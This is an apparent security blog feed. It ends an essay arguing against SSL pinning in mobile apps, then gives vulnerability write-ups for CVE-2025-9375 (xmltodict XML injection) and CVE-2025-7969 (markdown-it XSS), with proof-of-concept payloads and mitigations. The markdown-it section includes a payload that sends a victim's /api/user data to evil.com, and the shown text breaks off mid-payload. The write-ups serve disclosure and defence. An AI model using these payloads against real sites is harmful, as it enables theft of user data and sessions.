&lt;li&gt;&lt;strong&gt;Android:&lt;/strong&gt; Network Security Configuration allows an opt-in for certificate transparency, meaning your app will only accept certificates that have valid SCTs (Signed Certificate Timestamps) proving they were logged in CT.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;iOS:&lt;/strong&gt; Provides the &lt;code&gt;NSRequiresCertificateTransparency&lt;/code&gt; flag in App Transport Security to require CT for certain domains, as noted by Apple&apos;s engineers.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Enforcing CT means that if someone (even a trusted CA) tries to issue a certificate for your domain behind your back, it would not be accepted by the app unless it&apos;s publicly logged (and you could detect it).&lt;/p&gt;
&lt;p&gt;Apple&apos;s security team has highlighted CT as a &lt;em&gt;&quot;great tool&quot;&lt;/em&gt; to verify server certificates and recommended checking for CT compliance when evaluating a server&apos;s trustworthiness.&lt;/p&gt;
&lt;p&gt;In practice, you should also set up CT monitoring: there are services (and free tools) that alert you if a new certificate for your app&apos;s domains appears in the logs. This way, you can quickly respond to any misissued or malicious certificates (e.g., by revoking them or alerting the CA) without needing to pin.&lt;/p&gt;
&lt;p&gt;CT provides transparency and accountability in the certificate ecosystem, covering the threat that pinning was meant to catch, but in a far more flexible way.&lt;/p&gt;
&lt;h3&gt;3. Use HSTS and Secure Server Configurations&lt;/h3&gt;
&lt;p&gt;On the server side, enable &lt;strong&gt;HTTP Strict Transport Security (HSTS)&lt;/strong&gt; for your domains. HSTS instructs browsers (and by extension in-app web views) to never downgrade to HTTP and to automatically redirect to HTTPS.&lt;/p&gt;
&lt;p&gt;While a mobile app&apos;s own network calls will typically be coded to use HTTPS already, HSTS is still valuable if any part of your app uses web content or if users might interact with links to your domain. It eliminates certain MITM tricks (like stripping HTTPS to HTTP).&lt;/p&gt;
&lt;p&gt;Moreover, even though mobile apps don&apos;t inherently parse HSTS headers, having HSTS on your API domain means if someone tries to access it via a browser (for example, an OAuth login flow or a user following a link), they&apos;ll be protected.&lt;/p&gt;
&lt;p&gt;Consider getting your domain on the &lt;strong&gt;HSTS preload list&lt;/strong&gt; if appropriate, which ensures all clients know to use HTTPS from the first visit.&lt;/p&gt;
&lt;p&gt;Alongside HSTS, make sure your TLS configuration on the server is solid:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Support the latest protocols (TLS 1.3 and 1.2, drop older versions).&lt;/li&gt;
&lt;li&gt;Use strong cipher suites.&lt;/li&gt;
&lt;li&gt;Keep your server&apos;s TLS library up to date.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The good news is that mobile platforms enforce this to some extent:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;iOS&apos;s App Transport Security by default requires TLS 1.2+ and reasonable ciphers.&lt;/li&gt;
&lt;li&gt;Android will by default use TLS 1.3 when available.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So adhere to those defaults, don&apos;t weaken security by allowing old protocols. Enabling features like &lt;strong&gt;OCSP Stapling&lt;/strong&gt; and checking certificate revocation status can also help (though revocation checking in mobile apps can be tricky and is often bypassed if not stapled).&lt;/p&gt;
&lt;p&gt;In summary: treat your server&apos;s TLS config with the same care as you would for a banking website: score an &quot;A&quot; on SSL Labs, use modern TLS and strong algorithms. A robust TLS setup reduces the risk of any successful MITM.&lt;/p&gt;
&lt;h3&gt;4. Leverage Public Key Infrastructure Extensions (CAA, etc.)&lt;/h3&gt;
&lt;p&gt;The broader PKI ecosystem offers additional tools to harden certificate issuance. One such measure is &lt;strong&gt;CAA (Certificate Authority Authorization)&lt;/strong&gt; DNS records.&lt;/p&gt;
&lt;p&gt;By publishing CAA records, you specify which CAs are allowed to issue certificates for your domain. This won&apos;t directly be known to the app, but it prevents unauthorized CAs from issuing certs in the first place (or at least, compliant CAs will refuse if they&apos;re not on your list).&lt;/p&gt;
&lt;p&gt;For example, you might set a CAA record to only allow &lt;code&gt;pki.goog&lt;/code&gt; (Google Trust Services) or Let&apos;s Encrypt for your domain. This way, even if someone tricked a lesser-known CA, that CA should deny the request.&lt;/p&gt;
&lt;p&gt;Using CAA in combination with CT monitoring significantly lowers the likelihood of misissued certs going unnoticed.&lt;/p&gt;
&lt;p&gt;Another emerging concept is &lt;strong&gt;DANE (DNS-based Authentication of Named Entities)&lt;/strong&gt;, where the TLS public key or certificate is pinned in DNS (secured by DNSSEC). DANE isn&apos;t widely adopted in mobile apps yet, but it&apos;s an interesting future path.&lt;/p&gt;
&lt;p&gt;The key point is that there are standards-based ways to lock down certificate issuance and validity that operate at the infrastructure level, rather than baked into app code.&lt;/p&gt;
&lt;h3&gt;5. Follow Platform Security Best Practices&lt;/h3&gt;
&lt;p&gt;Use the security features provided by Android and iOS rather than reinventing the wheel.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;On Android:&lt;/strong&gt;&lt;br /&gt;
Use &lt;strong&gt;Network Security Configuration&lt;/strong&gt; files to declaratively enforce policies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;disallow cleartext (HTTP) entirely,&lt;/li&gt;
&lt;li&gt;add any custom CA if you genuinely need it (for instance, in a debug build or for an internal server),&lt;/li&gt;
&lt;li&gt;enable the certificate transparency requirement as mentioned earlier.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The Network Security Config also allows a &lt;strong&gt;&lt;code&gt;debug-overrides&lt;/code&gt;&lt;/strong&gt; section, so you can allow certain debugging CAs during development without affecting production builds, a much safer approach than writing custom trust logic.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;On iOS:&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;App Transport Security (ATS)&lt;/strong&gt; is enabled by default, which already requires HTTPS connections, strong ciphers, and certificate trust built-in. Avoid turning off ATS exceptions unless absolutely necessary.&lt;/p&gt;
&lt;p&gt;If you have to allow an HTTP endpoint or a weaker cipher for some reason, scope it narrowly in your &lt;code&gt;Info.plist&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Essentially, align with the platform&apos;s default security posture: both iOS and Android by 2025 have very sane defaults that eliminate most trivial MITM opportunities (e.g. no user-added CA trust on Android by default for new apps, mandatory TLS, etc.).&lt;/p&gt;
&lt;p&gt;Where you have special needs, prefer configuration to code. And if you ever consider doing pinning-like restrictions, use the provided configuration mechanisms rather than custom code, they are less error-prone and easier to update.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;SSL pinning had its moment in the spotlight as a clever solution to bolster connection security in mobile
apps. But as we&apos;ve discussed, that solution has proven to be a double-edged sword. Over time, the
drawbacks, unexpected outages, difficult maintenance, compatibility problems, and limited real
security gains, have become apparent through hard experience.&lt;/p&gt;
&lt;p&gt;In the meantime, the security of the web&apos;s PKI infrastructure has improved with initiatives like shorter
certificate lifetimes, Certificate Transparency, and stricter CA oversight. The competitive advantage
today is to work with those improvements rather than against them.&lt;/p&gt;
&lt;p&gt;Industry leaders and platform providers now virtually all agree: &lt;strong&gt;SSL pinning is largely obsolete as a
best practice.&lt;/strong&gt; Unless you have a truly compelling use case and the capacity to manage it correctly, you
should avoid pinning in your Android and iOS apps.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Google says don&apos;t do it.&lt;/li&gt;
&lt;li&gt;Apple says you shouldn&apos;t need it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you still think you need pinning, carefully weigh the trade-offs and ensure you implement it with
multiple pins, backups, and a plan for rotation, and be prepared for the headaches that come with it.&lt;/p&gt;
&lt;p&gt;For the vast majority of mobile apps, you&apos;ll achieve far better security and reliability by embracing
modern TLS configurations and platform security features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use HTTPS everywhere (mandatory on mobile now anyway).&lt;/li&gt;
&lt;li&gt;Enforce strong TLS.&lt;/li&gt;
&lt;li&gt;Turn on certificate transparency enforcement.&lt;/li&gt;
&lt;li&gt;Keep an eye on your domain&apos;s certificates via CT logs.&lt;/li&gt;
&lt;li&gt;Harden your servers and use measures like HSTS and CAA to prevent and detect misuse of certificates.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And remember that ultimately, security is multilayered: the transport layer is just one piece. A secure
app also involves proper authentication, data encryption at rest, code integrity checks, and so on.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;In 2025, the consensus is that it&apos;s time to move on from SSL pinning.&lt;/strong&gt;&lt;br /&gt;
What once may have provided a sense of security is now understood to be more trouble than it&apos;s worth
in most cases. By following current best practices and the guidance of Android and iOS developers, you
can secure your app&apos;s network communication in a robust way without resorting to pinning, achieving
security and stability for both your development process and your users.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Sources&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.android.com/privacy-and-security/security-ssl&quot;&gt;Android Developers : Security with network protocols&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.android.com/privacy-and-security/security-config&quot;&gt;Android Developers : Network Security Configuration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.apple.com/news/?id=g9ejcf8y&quot;&gt;Apple Developer Technical Note : &quot;Identity Pinning: How to configure server certificates for your app&quot;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.apple.com/forums/thread/675791&quot;&gt;Apple Developer Forums : Discussion on MITM protection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning&quot;&gt;OWASP Foundation : Certificate and Public Key Pinning&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://blog.cloudflare.com/why-certificate-pinning-is-outdated/&quot;&gt;Cloudflare Blog : &quot;Avoiding downtime: modern alternatives to outdated certificate pinning practices&quot;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://8ksec.io/why-you-should-remove-ssl-pinning-from-your-mobile-apps-in-2025/&quot;&gt;8ksec Blog : &quot;Why you should remove SSL Pinning from Your Mobile Apps in 2025&quot;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>CVE-2025-9375: XML Injection Vulnerability in xmltodict 0.14.2 - Mono</title><link>http://caverav.cl/posts/xmltodict-xml-injection/xmltodict-xml-injection/</link><guid isPermaLink="true">http://caverav.cl/posts/xmltodict-xml-injection/xmltodict-xml-injection/</guid><pubDate>Mon, 25 Aug 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Executive Summary&lt;/h2&gt;
&lt;p&gt;I discovered an XML Injection vulnerability in &lt;code&gt;xmltodict&lt;/code&gt; version 0.14.2, a popular Python library with over 1.5 million weekly downloads on PyPI. This vulnerability allows attackers to inject arbitrary XML markup through crafted dictionary keys, potentially leading to XML structure manipulation, data corruption, and in web contexts, cross-site scripting (XSS) attacks.&lt;/p&gt;
&lt;p&gt;The vulnerability stems from insufficient input validation in the &lt;code&gt;_emit&lt;/code&gt; function, where user-controlled dictionary keys are directly used as XML tag names without any sanitization or validation.&lt;/p&gt;
&lt;h2&gt;Background: Understanding xmltodict&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;xmltodict&lt;/code&gt; is a Python library that provides bidirectional conversion between XML and Python dictionaries. Its primary functions are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;xmltodict.parse()&lt;/code&gt; - Converts XML to Python dictionaries&lt;/li&gt;
&lt;li&gt;&lt;code&gt;xmltodict.unparse()&lt;/code&gt; - Converts Python dictionaries back to XML&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The library is widely used in web applications, APIs, and data processing pipelines where XML manipulation is required. Its popularity makes this vulnerability particularly concerning from a supply chain security perspective.&lt;/p&gt;
&lt;h2&gt;Technical Analysis&lt;/h2&gt;
&lt;h3&gt;The Vulnerable Code Path&lt;/h3&gt;
&lt;p&gt;The vulnerability resides in the &lt;code&gt;_emit&lt;/code&gt; function within &lt;code&gt;xmltodict.py&lt;/code&gt; (lines 378-451). Let&apos;s examine the critical code path:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def _emit(key, value, content_handler,
          attr_prefix=&apos;@&apos;,
          cdata_key=&apos;#text&apos;,
          depth=0,
          preprocessor=None,
          pretty=False,
          newl=&apos;\n&apos;,
          indent=&apos;\t&apos;,
          namespace_separator=&apos;:&apos;,
          namespaces=None,
          full_document=True,
          expand_iter=None):
    key = _process_namespace(key, namespaces, namespace_separator, attr_prefix)
    if preprocessor is not None:
        result = preprocessor(key, value)
        if result is None:
            return
        key, value = result
    # ... processing logic ...
    
    # VULNERABLE LINE: Direct use of user input as XML tag
    content_handler.startElement(key, AttributesImpl(attrs))  # Line 436
    
    # ... more processing ...
    
    content_handler.endElement(key)  # Line 449
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Root Cause Analysis&lt;/h3&gt;
&lt;p&gt;The vulnerability occurs because:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;No Input Validation&lt;/strong&gt;: The &lt;code&gt;key&lt;/code&gt; parameter (dictionary keys from user input) is used directly as an XML element name&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Missing Sanitization&lt;/strong&gt;: No escaping or validation is performed on the key before passing it to &lt;code&gt;startElement()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Trust Assumption&lt;/strong&gt;: The code assumes dictionary keys are safe XML tag names&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;XML Tag Name Requirements vs Reality&lt;/h3&gt;
&lt;p&gt;Valid XML tag names must follow these rules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Start with a letter or underscore&lt;/li&gt;
&lt;li&gt;Contain only letters, digits, hyphens, periods, and underscores&lt;/li&gt;
&lt;li&gt;Cannot contain spaces or special characters like &lt;code&gt;&amp;lt;&lt;/code&gt;, &lt;code&gt;&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;amp;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The vulnerability exploits the fact that &lt;code&gt;xmltodict&lt;/code&gt; doesn&apos;t enforce these constraints.&lt;/p&gt;
&lt;h2&gt;Exploitation Scenarios&lt;/h2&gt;
&lt;h3&gt;Basic XML Structure Manipulation&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Payload:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;malicious_data = {&quot;item&amp;gt;&amp;lt;injected&amp;gt;malicious content&amp;lt;/injected&amp;gt;&amp;lt;item&quot;: &quot;value&quot;}
xml_output = xmltodict.unparse(malicious_data, full_document=False)
print(xml_output)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Output:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;item&amp;gt;&amp;lt;injected&amp;gt;malicious content&amp;lt;/injected&amp;gt;&amp;lt;item&amp;gt;value&amp;lt;/item&amp;gt;&amp;lt;injected&amp;gt;malicious content&amp;lt;/injected&amp;gt;&amp;lt;item&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The injected XML breaks the intended structure and introduces arbitrary elements.&lt;/p&gt;
&lt;h3&gt;Advanced Multi-Stage Injection&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Payload:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;complex_payload = {
    &quot;product&amp;gt;&amp;lt;price&amp;gt;999999&amp;lt;/price&amp;gt;&amp;lt;description&amp;gt;HACKED&quot;: &quot;legitimate_value&quot;,
    &quot;legitimate_field&quot;: &quot;normal_data&quot;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This could manipulate e-commerce XML data by injecting false pricing information.&lt;/p&gt;
&lt;h3&gt;Web Application Context&lt;/h3&gt;
&lt;p&gt;In web applications that render XML output in browsers:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Payload:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;xss_payload = {&quot;item&amp;gt;&amp;lt;script&amp;gt;alert(&apos;XSS&apos;)&amp;lt;/script&amp;gt;&amp;lt;item&quot;: &quot;data&quot;}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When this XML is rendered in a web context without proper escaping, it results in JavaScript execution.&lt;/p&gt;
&lt;h2&gt;Proof of Concept&lt;/h2&gt;
&lt;p&gt;Here&apos;s a complete demonstration:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/env python3
import xmltodict

def demonstrate_xml_injection():
    &quot;&quot;&quot;Demonstrates the XML injection vulnerability&quot;&quot;&quot;

    print(&quot;=== CVE-2025-9375 XML Injection PoC ===\n&quot;)

    # Test Case 1: Basic structure breaking
    print(&quot;1. Basic XML structure manipulation:&quot;)
    payload1 = {&quot;item&amp;gt;&amp;lt;injected&amp;gt;MALICIOUS CONTENT&amp;lt;/injected&amp;gt;&amp;lt;dummy&quot;: &quot;value&quot;}
    result1 = xmltodict.unparse(payload1, full_document=False)
    print(f&quot;Input: {payload1}&quot;)
    print(f&quot;Output: {result1}&quot;)
    print()

    # Test Case 2: Attribute injection
    print(&quot;2. Attribute injection:&quot;)
    payload2 = {&quot;item attribute=&apos;malicious&apos;&quot;: &quot;value&quot;}
    result2 = xmltodict.unparse(payload2, full_document=False)
    print(f&quot;Input: {payload2}&quot;)
    print(f&quot;Output: {result2}&quot;)
    print()

    # Test Case 3: CDATA breaking
    print(&quot;3. CDATA section injection:&quot;)
    payload3 = {&quot;item&amp;gt;&amp;lt;![CDATA[]]&amp;gt;&amp;lt;script&amp;gt;alert(&apos;XSS&apos;)&amp;lt;/script&amp;gt;&amp;lt;dummy&quot;: &quot;value&quot;}
    result3 = xmltodict.unparse(payload3, full_document=False)
    print(f&quot;Input: {payload3}&quot;)
    print(f&quot;Output: {result3}&quot;)
    print()

if __name__ == &quot;__main__&quot;:
    demonstrate_xml_injection()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Expected Output:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;=== CVE-2025-9375 XML Injection PoC ===

1. Basic XML structure manipulation:
Input: {&apos;item&amp;gt;&amp;lt;injected&amp;gt;MALICIOUS CONTENT&amp;lt;/injected&amp;gt;&amp;lt;dummy&apos;: &apos;value&apos;}
Output: &amp;lt;item&amp;gt;&amp;lt;injected&amp;gt;MALICIOUS CONTENT&amp;lt;/injected&amp;gt;&amp;lt;dummy&amp;gt;value&amp;lt;/item&amp;gt;&amp;lt;injected&amp;gt;MALICIOUS CONTENT&amp;lt;/injected&amp;gt;&amp;lt;dummy&amp;gt;

2. Attribute injection:
Input: {&quot;item attribute=&apos;malicious&apos;&quot;: &apos;value&apos;}
Output: &amp;lt;item attribute=&apos;malicious&apos;&amp;gt;value&amp;lt;/item attribute=&apos;malicious&apos;&amp;gt;

3. CDATA section injection:
Input: {&quot;item&amp;gt;&amp;lt;![CDATA[]]&amp;gt;&amp;lt;script&amp;gt;alert(&apos;XSS&apos;)&amp;lt;/script&amp;gt;&amp;lt;dummy&quot;: &apos;value&apos;}
Output: &amp;lt;item&amp;gt;&amp;lt;![CDATA[]]&amp;gt;&amp;lt;script&amp;gt;alert(&apos;XSS&apos;)&amp;lt;/script&amp;gt;&amp;lt;dummy&amp;gt;value&amp;lt;/item&amp;gt;&amp;lt;![CDATA[]]&amp;gt;&amp;lt;script&amp;gt;alert(&apos;XSS&apos;)&amp;lt;/script&amp;gt;&amp;lt;dummy&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Impact Assessment&lt;/h2&gt;
&lt;h3&gt;Real-World Impact Scenarios&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;API Data Corruption&lt;/strong&gt;: REST APIs using xmltodict for XML responses could have their data structure corrupted&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Configuration File Manipulation&lt;/strong&gt;: Applications that generate XML config files could be compromised&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Web Application XSS&lt;/strong&gt;: When XML output is rendered in browsers, XSS attacks become possible&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Processing Pipelines&lt;/strong&gt;: ETL processes could inject malicious data into downstream systems&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Document Generation&lt;/strong&gt;: PDF or report generators using XML templates could be manipulated&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Affected Systems&lt;/h3&gt;
&lt;p&gt;Any application using &lt;code&gt;xmltodict.unparse()&lt;/code&gt; with user-controlled dictionary keys is vulnerable:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Web APIs converting JSON to XML&lt;/li&gt;
&lt;li&gt;Configuration management systems&lt;/li&gt;
&lt;li&gt;Data transformation pipelines&lt;/li&gt;
&lt;li&gt;Document generation services&lt;/li&gt;
&lt;li&gt;Integration platforms&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Mitigation Strategies&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Input Validation&lt;/strong&gt;: Validate dictionary keys before passing to &lt;code&gt;unparse()&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;import re
def safe_xml_key(key):
    # Only allow valid XML name characters
    return re.match(r&apos;^[a-zA-Z_][a-zA-Z0-9_.-]*$&apos;, key) is not None
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Key Sanitization&lt;/strong&gt;: Sanitize keys to remove dangerous characters&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;def sanitize_dict_keys(data):
    if isinstance(data, dict):
        sanitized = {}
        for key, value in data.items():
            # Replace invalid characters
            safe_key = re.sub(r&apos;[^a-zA-Z0-9_.-]&apos;, &apos;_&apos;, str(key))
            sanitized[safe_key] = sanitize_dict_keys(value)
        return sanitized
    return data
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Alternative Libraries&lt;/strong&gt;: Consider using libraries with better input validation.&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong&gt;References:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/martinblech/xmltodict&quot;&gt;xmltodict GitHub Repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection&quot;&gt;OWASP XML Injection Guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://fluidattacks.com/advisories/mono&quot;&gt;Security Advisory&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-9375&quot;&gt;CVE-2025-9375 Details&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>CVE-2025-7969: Markdown-it Fence Rendering XSS - Fito</title><link>http://caverav.cl/posts/markdown-it-xss/markdown-it-xss/</link><guid isPermaLink="true">http://caverav.cl/posts/markdown-it-xss/markdown-it-xss/</guid><pubDate>Wed, 20 Aug 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;p&gt;Markdown-it &lt;code&gt;14.1.0&lt;/code&gt; contains an XSS vulnerability (CVE-2025-7969) that enables arbitrary JavaScript execution through a fence rendering bypass. This post provides a technical deep dive into the vulnerability, exploitation techniques, and real-world impact scenarios.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Technical Analysis&lt;/h2&gt;
&lt;h3&gt;The Core Vulnerability&lt;/h3&gt;
&lt;p&gt;The vulnerability exists in the library&apos;s fence rendering logic. Markdown-it uses a naive string check in its &lt;code&gt;default_rules.fence&lt;/code&gt; function that bypasses all security controls when highlight functions return HTML starting with &lt;code&gt;&amp;lt;pre&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// lib/renderer.mjs lines 48-50
if (highlighted.indexOf(&apos;&amp;lt;pre&apos;) === 0) {
    return highlighted + &apos;\n&apos;  // Direct return bypasses all sanitization
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Fence Rendering Mechanics&lt;/h3&gt;
&lt;p&gt;When processing fenced code blocks, the library accepts user-controlled content through custom highlight functions. The vulnerability occurs when:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A custom &lt;code&gt;options.highlight&lt;/code&gt; function processes user input&lt;/li&gt;
&lt;li&gt;The function returns content that starts with the string &lt;code&gt;&amp;lt;pre&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Markdown-it bypasses &lt;strong&gt;all&lt;/strong&gt; HTML escaping and sanitization&lt;/li&gt;
&lt;li&gt;Malicious content is injected directly into the DOM&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;// Vulnerable fence processing flow
default_rules.fence = function (tokens, idx, options, env, slf) {
  const token = tokens[idx]
  // ... language processing ...
  
  let highlighted
  if (options.highlight) {
    // User-controlled content processed here
    highlighted = options.highlight(token.content, langName, langAttrs) || escapeHtml(token.content)
  } else {
    highlighted = escapeHtml(token.content)  // Safe path
  }

  // THE VULNERABILITY: No validation of highlight function output
  if (highlighted.indexOf(&apos;&amp;lt;pre&apos;) === 0) {
    return highlighted + &apos;\n&apos;  // Direct injection!
  }
  
  // Normal safe rendering path
  return `&amp;lt;pre&amp;gt;&amp;lt;code${slf.renderAttrs(token)}&amp;gt;${highlighted}&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;\n`
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;The XSS Injection Chain&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Input Phase&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;User provides fenced code block with malicious content&lt;/li&gt;
&lt;li&gt;Content is designed to trick highlight functions into returning &lt;code&gt;&amp;lt;pre&lt;/code&gt;-prefixed HTML&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Processing Phase&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Custom highlight function processes the malicious input&lt;/li&gt;
&lt;li&gt;Function returns HTML containing both legitimate &lt;code&gt;&amp;lt;pre&amp;gt;&lt;/code&gt; tags and malicious payloads&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Bypass Phase&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Markdown-it&apos;s string check &lt;code&gt;highlighted.indexOf(&apos;&amp;lt;pre&apos;) === 0&lt;/code&gt; passes&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;All sanitization is bypassed&lt;/strong&gt; - content returned directly&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Injection Phase&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Malicious HTML/JavaScript executes in browser context&lt;/li&gt;
&lt;li&gt;No Content Security Policy or input validation can stop it at this point&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Advanced Exploitation Vectors&lt;/h3&gt;
&lt;h4&gt;Direct Code Block Injection&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;const maliciousMarkdown = `
\`\`\`javascript
&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;console.log(&quot;Normal code&quot;);&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;img src=&quot;x&quot; onerror=&quot;alert(&apos;XSS!&apos;)&quot;&amp;gt;
\`\`\`
`;

// Highlight function that enables the vulnerability
const vulnerableHighlight = (str, lang, attrs) =&amp;gt; {
    if (str.trim().startsWith(&apos;&amp;lt;pre&apos;)) {
        return str;  // Direct return enables bypass
    }
    return `&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;${str}&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;`;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;Event Handler Injection&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;const eventHandlerPayload = `
\`\`\`html
&amp;lt;pre onclick=&quot;fetch(&apos;/api/user&apos;, {credentials:&apos;include&apos;}).then(r=&amp;gt;r.json()).then(d=&amp;gt;fetch(&apos;//evil.com/&apos;+btoa(JSON.stringify(d))))&quot; style=&quot;cursor:pointer;background:#f00;color:white;padding:10px;&quot;&amp;gt;
Click for data exfiltration
&amp;lt;/pre&amp;gt;
\`\`\`
`;
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;DOM-Based XSS Chain&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;// Multi-stage attack through DOM manipulation
const domChainPayload = `
\`\`\`javascript
&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;function legitimate() { return true; }&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;
&amp;lt;script&amp;gt;
// Stage 1: Setup persistence
